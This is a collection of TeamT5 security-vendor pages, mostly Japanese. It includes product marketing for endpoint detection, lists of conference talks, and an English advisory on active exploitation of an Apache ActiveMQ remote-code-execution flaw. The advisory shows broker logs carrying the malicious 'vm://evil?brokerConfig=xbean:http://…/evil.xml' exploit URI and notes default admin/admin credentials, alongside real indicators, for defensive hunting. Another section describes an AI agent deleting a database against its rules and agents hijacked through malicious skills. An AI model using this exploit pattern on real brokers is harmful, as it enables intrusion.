資料
ブログ

エンドポイントへの攻撃は、ますます巧妙化しています。多くの場合、悪意ある活動は初期段階では通常のオペレーションと区別することが難しく、リスクを正確に判断する前には長期の観察が必要になります。 そのためエンドポイント防御は、個々のイベントへの対応だけでは不十分であり、攻撃がエンドポイント上でどのように形成され、潜伏し、時間とともに進行していくのかを理解することに焦点を当てる必要があります。これにより、行動を適切なコンテキストの中で解釈することが可能になります。 エンドポイント脅威の現実:既知の脅威と新たなリスク エンドポイントレベルでは、防御側は主に2種類のリスクに直面します。 既知のマルウェアはシグネチャによって識別され、検知・マッチングの仕組みにより早期にブロックすることが可能です。 一方で、未知または未定義の脅威は、正規プログラムやシステム操作、複雑なプロセスチェーンとして現れることが多く、その意図を判断するためには時間をかけた振る舞い分析が必要となります。 このような二面性により、単一ポイントでの検知では不十分となります。効果的なエンドポイント防御には、リアルタイム対応と継続的な観察の両立が求められます。これにより、セキュリティチームは侵害後に対応するのではなく、エンドポイント上で疑わしい挙動がどのように進展するかをを追跡することができます。 ThreatSonar Anti-Ransomware:攻撃段階全体をカバーする防御 このような進化を踏まえると、エンドポイント防御の有効性は単一の検知技術に依存するものではなく、攻撃の各段階に応じて防御メカニズムが適切に対応できるかどうかにかかっています。攻撃の進行に応じて観察や対応が適応できない場合、防御は特定の瞬間に見えている範囲に限定されてしまいます。 この段階ベースのアプローチは、行動の進化に応じて検知と対応を適応させることを重視するNIST Cybersecurity Framework (NIST CSF)とも整合しています。ThreatSonar Anti-Ransomware Endpoint Detection & Responseプラットフォームのエンドポイント防御メカニズムはNIST CSFに準拠しており、 識別・防御 から 検知・対応・復旧 までのすべてのサイクルを通して組織を支援します。 脅威インテリジェンス、自動防御、リアルタイム検知を一つにしたことにより、悪意ある活動をを迅速に特定し遮断すると同時に、インシデント対応と分析を強化します。これにより、組織は多層防御とNIST CSFに沿ったセキュリティガバナンスを実現できます。 コンテキスト主導のエンドポイント防御 段階ベースの防御、 Endpoint Detection and Response (EDR) は、もはやインシデント発生後のにのみ有効化される機能ではありません。 代わりに、エンドポイントテレメトリを継続して蓄積し、時間の経過とともに解明します。攻撃の各段階における可視性と対応のコンテキストを提供することで、セキュリティチームはインシデントが顕在化する前にリスクを特定し、実行中も一貫した分析を維持し、調査のための完全なコンテキストを保持することが可能になります。 その結果、エンドポイント防御は単一イベントへの対応から、攻撃者の振る舞いとリスクコンテキストの理解に基づく運用へと進化し、インシデントライフサイクル全体におけるレジリエンスを強化します。 *Source: Google Cloud, M-Trends 2024: Our View from the Frontlines
![TeamT5 Global Speaking Engagements [2025]](https://teamt5-back.e-s.tw/api/files/teamt5-from-an-apac-threat-intelligence-pioneer-to-a-global-leader_en_pic.png)
TeamT5 actively shares its latest research findings and threat intelligence at international cybersecurity conferences, industry forums, and technical communities. This page provides a year-by-year archive of our public speaking engagements, highlighting TeamT5's research contributions and ongoing collaboration with the global cybersecurity community. Date Event Topic Speaker Jan. 21-22 JSAC (Japan) Evolution of Huapi Malware: Growing Focus on Edge Devices Yi-Chin Chuang (CTI Researcher), Yu-Tung Chang (CTI Researcher) Apr. 15-17 CYBERSEC (Taiwan) Kimsuky's Ongoing Evolution: Adapting Attack Strategies in Modern Environments Neo Chen (CTI Researcher) No Hunt, No Insight: Threat Hunting Techniques Based on MDR Experience LiYu (Project Manager), Kai (Security Engineer) OffSec Cert:from 0 to 0.5 Jason3e7 (Cyber Security Researcher) The Art of EDR Detection: Strengthening Detection Capabilities Through Evasion Techniques Zeze (Research Engineer), LiYu (Project Manager) How to Enhance Cybersecurity Incident Response Capabilities and Improve Incident Handling Maturity DM Wang (Product Manager) From Boot to Breach: Analyzing UEFI Bootkit Attack Techniques Zeze (Research Engineer) Exploring Network Device Vulnerabilities and Their Link to Attackers Jill Liu (Project Manager), Jason3e7 (Cyber Security Researcher) Jun. 10 The Hague Threat Intelligence Exchange (HagueTIX2025) (Netherlands) KnockHuoDuo Unmasked: The Fruit of China's Evolving Zero-Day Exploitation Strategy Greg Chen (Vulnerability Researcher), Yi-Chin Chuang (Cyber Threat Researcher), Charles Li (Chief Analyst) Sept. 24 Virus Bulletin (Germany) Google Calendar as C2 infrastructure: a China-nexus campaign with stealthy tactics Tim Chen (Cyber Threat Researcher), Still Hsu (Cyber Threat Researcher) Oct. 15~17 CyberCon Melbourne (Australia) Fraud and exploitation in China's global e-commerce boom Li-an Huang (CTI Analyst), Linda Kuo (Senior Threat Intelligence Analyst) Nov. 18~19 Code Blue (Japan) Bypassing Anti-Debugging: A Hybrid Real-Simulated Approach to Rootkit Analysis Yong-Xu Yang, Heng-Ming Fan, Yu Xuan Luo
![TeamT5 Global Speaking Engagements [2026]](https://teamt5-back.e-s.tw/api/files/teamt5-from-an-apac-threat-intelligence-pioneer-to-a-global-leader_en_pic.png)
TeamT5 actively shares its latest research findings and threat intelligence at international cybersecurity conferences, industry forums, and technical communities. This page provides a year-by-year archive of our public speaking engagements, highlighting TeamT5's research contributions and ongoing collaboration with the global cybersecurity community. Date Event Topic Speaker Jan. 21-23 JSAC (Japan) Incident Response at the Edge: Unmasking the Massive Exploitation of Ivanti Greg Chen (Vulnerability Researcher) Sharon Liu (Incident Response Engineer) May 5-7 CYBERSEC (Taiwan) Operation TradeBait: A Phantom Deal, A Real Cyber Trap Tay Cheng, Jessica FangTay Cheng (CTI Researcher) Jessica Fang (CTI Analyst) Practical Implementation of SEMI E187/E188 Standards:Consistent Security Assessment and Application for the Semiconductor Supply Chain DM Wang (Product Manager) Clean Redirects, Dirty SYSTEM: Bug Hunting by Abusing File Operations for Silent Privilege Escalation Sharkkcode (Research Engineer) May 6-8 PIVOTcon (Spain) Know Thy Network, Because They Already Do: A Case Study of SLIME27's Campaign against Telecoms Silvia Yeh (Cyber Threat Intelligence Analyst) Rax Chuang (Cyber Threat Researcher) May 19-20 CyberSec MY (Malaysia) The Evolving Cybersecurity Landscape in APAC: Real-World Threat Cases from Malaysia John Lu (Assistant Vice President,Global Engagement) June 15-19 FIRST Annual Conference (USA) Short Videos, Crypto, and Crime: Inside the Chinese-Speaking Malware Ecosystem Linda Kuo (Senior Threat Intelligence Analyst), Li-an Huang (CTI Analyst)

サイバーリスクは、もはや単発の脆弱性や場当たり的な攻撃だけで生じるものではありません。国家支援型の攻撃活動、ランサムウェア、外部に露出したインフラの悪用、信頼されたサプライチェーン経路の侵害が重なり合い、脅威環境は一段と複雑になっています。 この傾向は APAC で特に顕著です。政府機関、重要インフラ、IT・テクノロジー関連事業者など、社会や経済を支える領域が継続的に狙われています。同時に、攻撃者は既存の防御をすり抜けるため、手口を絶えず変化させています。 CISO やセキュリティ責任者にとって、課題は単に「脅威が増えている」ことではありません。より難しいのは、自組織に関係する脅威は何か、今すぐ対応すべきリスクはどれか、限られたセキュリティ投資をどこに振り向ければ露出を最も効果的に下げられるのかを判断することです。 サイバー防御における判断の壁 多くの組織は、すでにセキュリティツール、脆弱性情報、アラートや監視の仕組みを持っています。しかし、それだけでは判断に十分とは限りません。現場で不足しがちなのは、攻撃者の文脈です。なぜ自組織が狙われる可能性があるのか、攻撃者はどのような手口を使うのか、どの領域が悪用されやすいのかを理解できなければ、攻撃の全体像は見えにくくなります。 こうした判断の壁は、主に四つの形で表れます。 リスク評価が曖昧になります。 なぜ自組織が狙われるのかが見えなければ、どのリスクが自社にとって重要なのか、どれを優先すべきなのかを判断しにくくなります。 投資や対策が分散します。 本当に守るべき資産が明確でなければ、防御リソースは広く薄く配分され、重要な対象に集中しにくくなります。 初動対応が空回りしやすくなります。 攻撃手口や挙動が分からなければ、現場は何を調査し、何を封じ込めるべきかを判断するまでに時間を要します。 攻撃の兆候を見逃しやすくなります。 実際の攻撃で現れやすい痕跡や挙動を踏まえて監視できていなければ、初期の活動に気づきにくくなり、検知や対応の遅れにつながります。 つまり、問題は情報が足りないことだけではありません。脅威の文脈を、タイムリーな判断に変えられないことが問題です。その判断がなければ、防御は後手に回り続けます。 攻撃を理解し、防御の優先順位を決める 先手を打つには、攻撃者がどのように攻撃を進め、どの段階で防御側が介入できるのかを理解する必要があります。脅威インテリジェンスは、単なる静的な IoC リストではありません。攻撃がどのように準備され、侵入に使われ、継続的なアクセスにつながり、最終的に事業影響へ発展するのかを理解するための判断材料です。 攻撃者の視点で防御を見直すことで、対策はより具体的になります。特定の業界や環境が探索されている場合、インテリジェンスは自組織の露出を見直す手掛かりになります。特定の配信手法、マルウェアファミリー、悪用済み脆弱性が繰り返し確認される場合、セキュリティチームは想定される攻撃経路に優先的に目を向けることができます。C2 通信や関連する侵害の痕跡が観測された場合には、SOC が監視や検知ルールを見直す判断にもつながります。 重要なのは、被害が出てからインテリジェンスを振り返ることではありません。インシデントが深刻化する前に、判断と行動の根拠として活用することです。 脅威インテリジェンスは、セキュリティ判断をどう支えるか 脅威インテリジェンスの価値は、単に「脅威を知る」ことではなく、そこから「何を優先して動くべきか」を判断できるようにすることにあります。以下のユースケースは、異なる階層のセキュリティ業務において、インテリジェンスがどのように判断を支えるかを示しています。 1. 経営報告 地政学リスク、攻撃者の動向、業界の露出状況を、経営層が理解しやすい優先課題に整理します。監視、投資、リスク計画の判断材料として活用できます。 セキュリティ改善と脆弱性優先順位付け 深刻度スコアだけでなく、実際の悪用状況、脅威活動、事業影響を踏まえて、どの脆弱性を先に対応すべきかを判断します。 SOC/IR 連携 IoC、TTP、ハンティング仮説、検知ロジックを活用し、SIEM 監視、アラートのトリアージ、初動対応を強化します。 インシデント初動の仮説立て 調査の初期段階で、攻撃者の背景や関連キャンペーンの情報を使い、侵入経路、影響範囲、封じ込めの優先対象を絞り込みます。 ThreatVision は、脅威ランドスケープ、攻撃者の挙動、技術的な痕跡、監視に使える知見を結び付け、実務判断の土台として活用できる形に整理します。これにより、分散したインテリジェンスを、経営報告、優先順位付け、検知、調査、初動対応に結び付く具体的な行動へ変えることができます。 先手の防御は、焦点を絞ることから始まる すべての脅威に同じ緊急度で対応できる組織はありません。先手の防御は、焦点を絞ることから始まります。自組織に最も関係する脅威は何か、どの資産を優先して守るべきか、どの行動がリスク低減につながるのかを見極める必要があります。 脅威インテリジェンスは、その判断を支えるものです。攻撃者がどのように動くのかを理解し、自組織に関係するリスクを早い段階で捉え、限られたリソースを重要な判断と対策に集中させる。これにより、防御は被害発生後の対応にとどまらず、より早い段階で主導権を取り戻すための取り組みへと変わります。

生成AIや自動化技術の急速な進化に伴い、多くの企業がソフトウェア開発、運用管理、業務自動化、データ処理などの分野で様々なAIエージェントを導入しています。 AIエージェントは自律的にタスクを実行する能力を備えており、例えば次のような作業を行うことができます。 システムコマンドの実行 ローカルファイルや社内データへのアクセス APIの呼び出しや外部サービスとの連携 ユーザー指示に基づき、複数ステップのタスクを計画・実行 このように、AIが実際のシステム運用に直接関与するようになる中、新たな課題も浮上しています。 企業は、AIエージェントがエンドポイント上で引き起こすセキュリティリスクを十分に把握できているのでしょうか。 AIエージェントがもたらす可視化の課題 従来のエンドポイント監視では、セキュリティ担当者は通常次のような情報を把握できます。 システム上でどのようなプロセスが実行されているか 不審なプログラムや異常な挙動が存在しないか ファイルやネットワーク通信にどのような変化が生じているか しかし、AIエージェントには従来のアプリケーションとは異なる特性があり、エンドポイントの可視化に新たな課題をもたらしています。 AIエージェントの動作は自然言語によるプロンプトを起点としている 1つの指示が複数のシステム操作へと変換される可能性がある 一連の動作が継続的かつ高度に自動化されている こうした状況を踏まえ、企業は次のような問いに向き合う必要があります。 「現在、エンドポイント上でどれだけのAIエージェントが稼働しているのか」 「AIエージェントは機密データへアクセスしていないか」 「異常な動作や想定外の操作が発生していないか」 システムの挙動からAIの挙動へ:求められるエンドポイント監視の進化 AIエージェントの活用が広がるにつれ、エンドポイント監視の対象も従来のシステムの挙動から、AIによる操作やアクションへと広がりつつあります。 これは既存のセキュリティ対策を置き換えるものではありません。むしろ、「AIが何を行っているのか」「どのようにシステムを操作しているのか」を理解するための新たな視点を加えるものです。 その鍵となるのが、プロセス単位の監視から、コマンド単位での可視化と制御への拡張です。 これにより企業は AIエージェントが実際に実行しているコマンドを把握できる 行動パターンに異常がないか分析できる AIエージェントごとの行動プロファイルを構築できる ようになります。 AIエージェントの可視化を実現するための3つの能力 AIエージェントが稼働する環境を効果的に管理するためには、企業は次の3つの能力を備える必要があります。 1. 可視化 エンドポイント上に存在するAIエージェントとその活動状況を把握する 環境内にシャドーAIが存在することを防ぐ 実行されたコマンドや操作フローを把握する 2. 挙動分析 異常なコマンドパターンを検出する 機密データへの想定外のアクセスや、潜在的にリスクの高い挙動を特定する 3. セキュリティ統制 既存のセキュリティ製品や防御ツールと連携し、包括的な防御態勢を構築する ThreatSonar Plus:AIエージェントの挙動に対する可視性と検出能力の強化 AIエージェントの挙動監視に対するニーズの高まりを受け、TeamT5はThreatSonar Plus(包括的エンドポイント評価プラットフォーム)を提供しています。企業が既存のエンドポイントの保護基盤を拡張し、AIエージェントの実際の動作をより深く可視化できるように支援します。 ThreatSonar Plusの主な機能は以下のとおりです。 1. AIエージェントの挙動の可視化 エンドポイント上のAIエージェントの稼働状況を把握する 実行されたコマンドや操作フローを追跡する 2. コマンドレベルの検知 AIエージェントが実行したコマンドを分析する 異常または潜在的なリスクを伴う操作パターンを特定する 3. 挙動分析 セキュリティチームがインシデントの状況を迅速に把握できるように支援する ThreatSonar Plusは主に「検出」と「分析」に特化しており、包括的な可視性とリスク判断に必要な情報を提供します。 単一の診断スキャンにより、環境内のAIエージェントの導入状況とリスク状況を包括的に把握できます。 未承認のAIエージェントの導入 未承認のAIエージェントによるコマンド実行 リアルタイムの遮断・防御機能が必要な場合は、「 ThreatSonar Anti-Ransomware エンドポイント検出・対応(EDR)プラットフォーム 」と連携し、両製品を組み合わせて使用することで、 「挙動検出→リスク評価→リアルタイム保護」 という包括的なエンドポイントセキュリティ体制を構築できます。 AI時代におけるエンドポイントセキュリティの考え方 AIエージェントは徐々に企業内の重要な実行主体となりつつあり、単なる補助ツールから「実際にシステムを操作する主体」へと変化しています。 こうした変化により、エンドポイントセキュリティの重点もさらに広がっています。もはやプログラムやシステムを監視するだけでなく、AIの挙動そのものを理解し、把握しなければなりません。AIエージェントの可視性を高め、振る舞い分析の能力を強化することで、企業はAI技術を活用しながらも、環境に対する統制と安全性を維持することができます。 「 ThreatSonar Plus エンドポイント評価プラットフォーム 」と、「 ThreatSonar Anti-Ransomware 脅威分析・対応プラットフォーム 」は、AI時代において、より包括的で継続的に進化するエンドポイント防御基盤の構築を支援するために設計されています。 AI時代のサイバーレジリエンス強化について、ぜひお気軽にお問い合わせください。

The following blog post is based on our 2026 April H2 Vulnerability Insights Report. TeamT5 Vulnerability Research Team is dedicated to providing timely mitigation and response guidelines to critical vulnerabilities. Contact us for more information about our vulnerability intelligence. Active Exploitation of CVE-2026-34197 in Apache ActiveMQ TeamT5 has detected that a critical vulnerability (CVE-2026-34197) in Apache ActiveMQ has been actively exploited by threat actors, including the China-nexus APT SLIME88. Our investigation revealed that after exploitation, SLIME88 deployed SoxAgent RAT to compromise Linux devices and build an ORB network. We currently track the ORB network under the temporary name, GOBLIN14. The earliest SLIME88 attack can be traced back to April 7, shortly after the vulnerability was disclosed. The victims of SLIME88’s campaign included IT and manufacturing entities in the US, as well as entities in South Korea, India, France, and the US. We conclude the affected entities in Exploitation Status below. Executive Summary We assessed the severity of CVE-2026-34197 as critical and advised our customers to use this report to mitigate the impact. CVE-2026-34197 is a remote code execution (RCE) vulnerability in Apache ActiveMQ, an open-source Java message broker widely used in enterprise environments, across financial institutions, healthcare sector, governments, and more. Threat actors would send a crafted HTTP request to Apache ActiveMQ's Jolokia API endpoint, triggering the ActiveMQ broker to fetch a malicious XML configuration file from the C2 server and ultimately resulting in remote code execution. Although CVE-2026-34197 requires authentication, default credentials ( admin/admin ) are common in many cases. On some versions of Apache ActiveMQ, actors can exploit CVE-2024-32114[1] to bypass authentication. Apache disclosed CVE-2026-34197 on April 7 with mitigation information[2]. Public report indicated the vulnerability had been detected prior to the disclosure[3]. A proof-of-concept (PoC) exploit subsequently became publicly available,[4] and threat actors were observed exploiting the vulnerability in the wild shortly after disclosure.[5] Based on our investigation and current exploitation status of CVE-2026-34197, we depicted the Forensic Artifacts in this report and prepared a comprehensive Mitigation and Response Advisory for our customers. The Mitigation and Response Advisory includes: Official Information Related Indicators of Compromise of this vulnerability. Threat Hunting Tool: Log parsers to analyze ActiveMQ broker log produced by the exploitation of CVE-2026-34197 Exploitation Status CVE-2026-34197 has been actively exploited by threat actors, including the Chinese APT SLIME88. The victims included IT and manufacturing entities in the US, as well as entities in South Korea, India, France, and the US. China-nexus SLIME88[6] exploited CVE-2026-34197 to implant SoxAgent on Apache ActiveMQ entity. After receiving the crafted HTTP request, the victim host would fetch a malicious XML payload[7] from the C2 to exploit CVE-2026-34197, resulting in remote code execution. Afterwards, the actor deployed a download script[8] for SoxAgent. The C2 of the download script is 103.201.131.121. We detected sample of SoxAgent[9]. The C2s of SoxAgent are www.fastsecurey.info and 103.201.131.121. The victims included IT and manufacturing entities in the US, as well as entities in South Korea, India, France, and the US. We assessed that SLIME88 sought to compromise these devices with SoxAgent to build an ORB network, which we currently track as GOBLIN14. All malicious indicators associated with CVE-2026-34197 are summarized in the IoC section of this report. The full list can be downloaded via download page of ThreatVision. Mitigation and Response Advisory 1. Official Information Apache patched CVE-2026-34197 in ActiveMQ Classic Version 6.2.3 and 5.19.4 , released respectively on March 30 and 31. We highly recommend our clients and partners apply the patch as soon as possible. https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt 2. Mitigation It is recommended to change the default credentials (e.g. admin/admin ) and restrict access to Jolokia ( /api/jolokia ) and the Web Console, as these management interfaces expose sensitive broker operations. 3. Threat Hunting Tools CVE-2026-34197 has been actively exploited by threat actors. Our vulnerability team provided log parsers to analyze broker logs produced by the exploitation of CVE-2026-34197. The tools can also be downloaded from ThreatVision Threat Hunting Tools . Forensic Artifacts Threat actors would send a crafted HTTP request to Apache ActiveMQ’s Jolokia API endpoint. After receiving the request, the ActiveMQ broker would then process a malicious URI embedded in the HTTP request and retrieve a remote XML configuration file from the C2 server, triggering the exploitation of CVE-2026-34197 and ultimately achieving remote code execution. Therefore, we recommend using the log parser[10] to check the ActiveMQ broker log activemq.log ) for URIs containing vm:// and ?brokerConfig , which may indicate exploitation attempts. - Below is an example of a broker log produced by the exploitation of CVE-2026-34197: 2026-04-27 08:44:38,999 | INFO | Establishing network connection from vm://localhost to vm://evil?brokerConfig=xbean:http://<REDACTED>/evil.xml | org.apache.activemq.network.DiscoveryNetworkConnector | qtp504006221-38 2026-04-27 08:44:39,028 | WARN | Could not connect to remote URI: vm://evil?brokerConfig=xbean:http://<REDACTED>/evil.xml: The configuration has no BrokerService instance for resource: xbean:http://<REDACTED>/evil.xml | org.apache.activemq.network.DiscoveryNetworkConnector | qtp504006221-38 2026-04-27 08:44:39,029 | INFO | Network Connector DiscoveryNetworkConnector:NC:BrokerService[localhost] started | org.apache.activemq.network.NetworkConnector | qtp504006221-38 In some cases, the ActiveMQ broker may attempt to reconnect to the C2 server indefinitely. Each retry would attempt to re-fetch the malicious XML configuration file, generating failure errors in activemq.log . The error logs will contain Failed to load URL and connection error , which also serves as forensic artifacts of exploitation attempts. - Below is an example of the error log: 2026-04-27 08:50:10,379 | ERROR | Failed to load: URL [http://<REDACTED>/evil.xml], reason: IOException parsing XML document from URL [http://<REDACTED>/evil.xml]; nested exception is java.net.ConnectException: Connection refused (Connection refused) | org.apache.activemq.xbean.XBeanBrokerFactory | ActiveMQ Task-11 org.springframework.beans.factory.BeanDefinitionStoreException: IOException parsing XML document from URL [http://<REDACTED>/evil.xml]; nested exception is java.net.ConnectException: Connection refused (Connection refused) at org.springframework.beans.factory.xml.XmlBeanDefinitionReader.loadBeanDefinitions(XmlBeanDefinitionReader.java:342) at org.springframework.beans.factory.xml.XmlBeanDefinitionReader.loadBeanDefinitions(XmlBeanDefinitionReader.java:310) at org.apache.xbean.spring.context.ResourceXmlApplicationContext.loadBeanDefinitions(ResourceXmlApplicationContext.java:116) Appendix I: Malware Table Malware Table introduces the malware mentioned in this report. Name Type Description Used by First Seen SoxAgent RAT SoxAgent is a Linux backdoor that silently converts compromised hosts into SOCKS5 relay nodes. It maintains a persistent reverse connection to a hardcoded C2, negotiates AES-encrypted tunnels dynamically, and forwards TCP traffic through the victim to conceal attacker origin. Its supporting capabilities include remote update, self-deletion, and heartbeat reporting with falsified tunnel metrics. SLIME88 2026.04 Appendix II: Other critical CVEs TeamT5 also provides Patch Management Report (PMR) . Published every week (or more), the PMR will provide our customers with concise yet comprehensive updates on the most critical and exploitable vulnerabilities selected by TeamT5 vulnerability research team during the period. Each vulnerability will be provided with patch information. If you are interested in subscribing to this new report series, please contact TeamT5 for more information . Reference [1] CVE-2024-32114 is a vulnerability in Apache ActiveMQ Classic versions 6.0.0 through 6.1.1 which exposes the Jolokia API endpoint without authentication, allowing unauthenticated actors to interact directly with broker management operations. https://nvd.nist.gov/vuln/detail/cve-2024-32114 [2] Apache ActiveMQ Security Advisory for CVE-2026-34197 https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt [3] 10 Minutes with Claude: Remote Code Execution in Apache ActiveMQ (CVE-2026-34197) https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/ [4] Proof of Concept (PoC) of CVE-2026-34197: https://github.com/DEVSECURITYSPRO/CVE-2026-34197 [5] Apache.ActiveMQ.CVE-2026-34197.Code.Injection https://www.fortiguard.com/encyclopedia/ips/60672 [6] SLIME88 is a China-nexus APT. SLIME88 has targeted Taiwan’s energy sector through phishing emails and fake certificate installer, attempting to deploy backdoor programs such as AdaptixC2 and CobaltStrike. SLIME88 often uses Cloudflare to hide the real C2 IP address in order to evade tracking by researchers. [7] SHA-256: c5eacffa5c909209f97f720740802024761c432e8ebbd2d6e5b30fe0e79e19de [8] SHA-256: 968ec5e0c4aa7e15f0a04c5e7f96393aa7cbf12d2125dfe7dd20351408dd0615 [9] SHA-256: 60521e103bb134aea3169da6d3dfdcdae8e4d5e82df265a377b648bae39aca5f

最近、AIエージェントが人の確認を経ることなく企業のデータベースとバックアップを自律的に削除してしまった事例が話題となりました。1 事前に「破壊的なコマンドを実行しない」「不可逆的な操作を独自に判断しない」といったルールが設定されていたにもかかわらず、AIエージェントは想定外の動作を行い、深刻な影響をもたらしたのです。AIはもはや単に指示へ応答する存在ではありません。ツールを呼び出し、データへアクセスし、システム操作を実行できるようになった今、企業が考慮すべきリスクは「AIそのものの安全性」だけではなく、「AIがエンドポイント上で何を実行できるのか」という観点へと広がっています。 AIエージェントは新たな攻撃面となる AIエージェントは、従来のAIツールとは異なり、単に指示に応答するだけでなく、自ら思考し、計画を立て、利用するツールを選択しながらタスクを実行できます。「自然言語」がツールの呼び出しやシステム操作のインターフェースとなったことで、リスクはプロンプトそのものに留まらなくなっています。AIエージェントがタスクを解釈し、ツールを選択し、データを処理する過程にもリスクが存在するのです。言い換えれば、攻撃者が介入できるポイントは単一の入力から、AIエージェントがタスクを完了するまでのワークフロー全体へと拡大しています。ツールの説明文や出力結果、外部スキル、プラグイン、さらにはそれらを取り巻くAIエコシステムそのものがすべて、AIエージェントの判断や挙動に影響を与える可能性があります。 また、OpenClawエコシステムが悪用された事例は、スキルのサプライチェーンやツールエコシステムそのものが新たなセキュリティリスクになり得ることを示しています。2 外部スキルやツールに悪意のあるコンテンツが埋め込まれた場合、一見正常に見える業務フローであっても、想定外の結果へと誘導される可能性があります。 さらに厄介なのは、AIエージェントの実行プロセスが必ずしも完全に追跡できるとは限らない点です。予期しない結果が発生した場合でも、その原因や責任の所在を特定することは容易ではありません。AIエージェントが実際の業務環境でタスクを実行するようになると、その影響範囲はエンドポイント上のデータ、認証情報、設定、権限にまで及びます。もしAIエージェントが隠された命令や悪意のあるスキルの影響を受けた状態で、APIキーやデータベース認証情報、その他の機密情報へアクセスした場合、本来は制御されていたはずのデータアクセスやシステム操作が、予測困難な挙動へと変化する可能性があります。 エンドポイントとAIエージェントに関するリスクを包括的に把握するために、企業は標準化された評価手法を活用し、次の4つのステップで環境を確認できます。 資産インベントリ :エンドポイントデバイス、システム、AIエージェントの導入状況や利用状況を把握 リスクの特定 :脆弱性や設備不備に加え、AIエージェントに関連する潜在的なリスクの洗い出し リスクの優先順位付け :リスクの深刻度に応じて対応の優先順位付けを決定 対応方針の策定 :リスク評価結果や推奨される対策を基に、適切な対応につなげる こうしたプロセスにより、企業は一貫した基準でエンドポイントのリスクを評価できるようになります。また、評価結果を脆弱性対策やリソース配分、セキュリティ運用に関する意思決定に活用することで、より効果的なリスク管理を実現できます。 ThreatSonar Plus:自動化されたリスク評価でセキュリティの盲点を排除 ThreatSonar Plusは包括的なエンドポイントのリスク評価プラットフォームです。単一の評価プロセスで資産インベントリの作成から、リスクの検出、リスクの評価を実施し、企業のリスク管理を支援します。AIエージェントが日常業務の一部となる中で、エンドポイント環境に生じる新たなリスクの把握と対策を可能にします。主な評価項目は以下のとおりです。 資産およびAIエージェントのインベントリ :エンドポイント端末、OS、ソフトウェア、アプリケーションに加え、AIエージェントの導入・利用状況を可視化します。資産とAIエージェントの利用実態を一元的に把握することで、その後のリスク分析や管理の基盤を構築します。 AIエージェントのリスク評価 :機密情報の漏えいリスク、悪意のあるスキルの検出、隠れたコマンドの分析、最小権限管理など、AIエージェントに関連するリスクを評価します。APIキーや認証情報、機密データの露出状況に加え、不正なコマンドや悪意のある挙動、過剰な権限設定の有無を確認します。 脆弱性検出およびリスク評価 : 資産情報をCPE(Common Platform Enumeration)へマッピングし、CVEデータベースと照合することで、脆弱性情報とリスク評価を提供します。これにより、高リスクなソフトウェア、OSバージョン、エンドポイント端末の特定を支援します。 セキュリティ設定およびコンプライアンス評価 :システム設定をCISベンチマークに基づいて評価し、セキュリティベースラインへの準拠状況を確認します。また、OS、ネットワークセキュリティ、エンドポイント保護、セキュリティ監視の4領域において、SEMI E187への準拠評価にも対応しています。 AIエージェント起因のリスクを早期に管理する AIエージェントは急速に企業環境の一部となりつつあります。利便性や業務効率の向上をもたらす一方で、エンドポイントセキュリティに新たなリスクももたらしています。ThreatSonar Plusを活用することで、企業はエンドポイントの状況をより明確に把握し、潜在的なリスクを早期に特定・管理するとともに、急速に変化する技術や運用環境に対応したサイバー防御体制を構築を支援します。 Source: [1] https://www.aol.com/entertainment/dangerous-ai-escapes-deletes-entire-131400323.html [2] https://www.ithome.com.tw/news/173735